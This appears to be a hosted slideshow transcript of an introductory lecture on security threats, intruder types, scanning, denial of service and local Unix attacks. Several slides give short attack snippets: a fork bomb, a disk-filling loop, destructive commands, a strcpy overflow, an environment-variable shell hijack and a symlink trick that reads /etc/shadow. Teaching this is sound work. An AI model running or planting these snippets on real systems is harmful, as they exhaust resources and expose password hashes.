Security Threats and Intruders: Types and Classifications

known break in methods n.w
1 / 30
Embed
Share

Explore the various known break-in methods, risk factors, intruder types such as hackers, spies, terrorists, corporate raiders, vandals, and voyeurs. Learn about the classification of security threats based on external and internal attacks, intentional vs. unintentional attacks, and active vs. passive interference in computer systems.

  • Security Threats
  • Intruders
  • Break-in Methods
  • Risk Factors
  • Classification
rayaanacharya
aany_900 Follow

Uploaded on | 0 Views

Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

You are allowed to download the files provided on this website for personal or commercial use, subject to the condition that they are used lawfully. All files are the property of their respective owners.

Download Presentation

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.

E N D

Presentation Transcript

  1. Known break-in methods prototypes of methods and interventions in the system active and passive interference

  2. Risk = Weak Points + Threat Weak point - this is a possible attack gate Threat - is an action or event that may violate the security of the information system environment, elements of threat: Targets - aspect of security that can be attacked Perpetrators - people or companies from which the threat emerges Events - types of activities that create a threat

  3. Intruders Hacker an attacker who breaches security for the sole fact and validation of his technical skills. Spy attackers to obtain information that can be used in political matters. Terrorist an attacker who tries to create a threat for political gain.

  4. Intruders Corporate raider an attacker, often an employee, engaging in illegal activities against competitors for financial gain. Professional criminal attacking computers for personal financial gain.

  5. Intruders Vandal the attacker to perform destruction. Voyeur the attacker for the sake of experiencing the feeling of fear associated with the fact of obtaining relevant information.

  6. Classification of security threats Division according to the place from where an attack is carried out: External - an attack carried out from a system outside the target network Internal - an attack launched from a system on the target network

  7. Safety hazard classification (cont.) Breakdown by Intent to Attack: Intentional - the attacker becomes aware of what he is doing Unintentional - the attacker accidentally attacks

  8. Safety hazard classification (cont.) Division according to the effect of the attack: Active - as a result of the attack, the computer system loses its integrity Passive - an attack consisting in entering the system without making any changes

  9. Hacker motivations Challenge Greed Malicious intent

  10. Attack anatomy Security reconnaissance Security enumeration Gathering information Security breach Take control Intrusion Exit the system Seating Covering traces

  11. Security attacks Normal flow Interruption Covering traces Interception Falsification

  12. Scanning Scanning network addresses - browsing subsequent IP addresses from the assumed range in order to select a victim or learn the topology of the attacked network Scanning network ports browsing successive network ports of the computer system in order to obtain information about open ports and services provided.

  13. Half-open scanning

  14. Reset scan The hacker sends a TCP TSR packet to the existing system. Existing system is not responding The router sends an ICMP Host Unreachable message in response to a TCP RST packet sent to the nonexistent system Target systems The hacker sends a TCP RST to a nonexistent address

  15. Crafted TCP / UDP packets Timedout Packet Fragmentation Invalid IP Header Length Invalid IP Field Values ICMP Address Mask Request Type 17 ICMP Timestamp Request Type 13

  16. Identification of the operating system The techniques for identifying the type of operating system are based on analyzing the TCP / IP protocol stack. The stack is implemented differently by different system builders.

  17. Destructive attacks Format the hard disk partition or run a command newfs/mkfs Removing critical files (e.g. files from /dev or /etc/passwd) Computer power off Cutting network cables

  18. DoS DoS A group of attacks aimed at causing a failure or overload of a host or service on the network.

  19. Smurf attack Hacker sends an ICMP Echo-Request packet to a large network address with a source address claiming to be the target system ICMP Echo-Response messages come from every system in a large network to the target system

  20. Distributed DoS The hacker sends commands to the master to start the attack The master sends commands to the slaves to start the attack Slaves launch an attack and paralyze the target

  21. Process congestion attack The user contributes to blocking the system in which other users are also active. Sample code : Modes of operation : 1) kill TERM 1 2) exec /bin/su; password: ****** main() { while (1) fork(); }

  22. Disk attacks Disk full Attack on directory structure while mkdir ./another_directory cd ./another_directory cp /bin/cc fill_it_up done The problem with the exchange space The problem with / tmp Problems with I-nodes

  23. Buffer overflow attack A buffer overflow is where you assign a variable to a value that takes up more memory than has been allocated to that variable. void problem_function(char *big_string) { char small_string[8]; strcpy(small_string, big_string); } void main() { char big_string[64]; int i; for(i=0;i<63;i++) big_string[i]= a ; problem_function(big_string); }

  24. Attacks overwriting system variables In situations where the attacked program offers the possibility of overwriting the buffer, its size is so small that it will not fit the bytes that would allow the shell to be invoked. In this case, you can try to write this code to one of the system variables.

  25. Attacks using system variables Program example: void main() { char *pakuj; if((pakuj=getenv( PAKER )) !=NULL { strcat(pakuj, dane ); system(pakuj); } else { system( /bin/gzip dane ); } } Linia polece : $ls lga /usr/bin/example $PAKER= ./sh $export PAKER $cat ./sh $example bash#

  26. Symbolic link attacks Business card program : void main() { system( /bin/cat $HOME/.wizyt wka.cfg ); } Command line : $ln s f /etc/shadow ./.wizyt wka.cfg $wizyt wka root:L7Zfwf455:10165:-1:-1:-1:-1:-1:-1 ............... hacker:/ffW4Gger:10209:-1:-1:-1:-1:-1:-1

  27. Email bombers A group of programs that are also used for DoS attacks. The algorithm is simple but very effective, it consists in sending as many of the same letters as possible to the same recipient.

  28. Trojan horses and viruses Trojan horses - allow remote control of the target computer. Programs of this type are dangerous due to the possibility of performing operations on a computer in a protected network (e.g. BackOrifice2000) Viruses self-replicating programs can damage hardware, data systems, open the door for an intruder, etc.

  29. Social engineering Social engineering is the use of non-technical means to obtain unauthorized access to information or systems. It takes advantage of the weakness of the human factor.

  30. Other attacks Command-channel atttacks Data-driven attack Third-party attack False authentification

Related


No related presentations.

More Related Content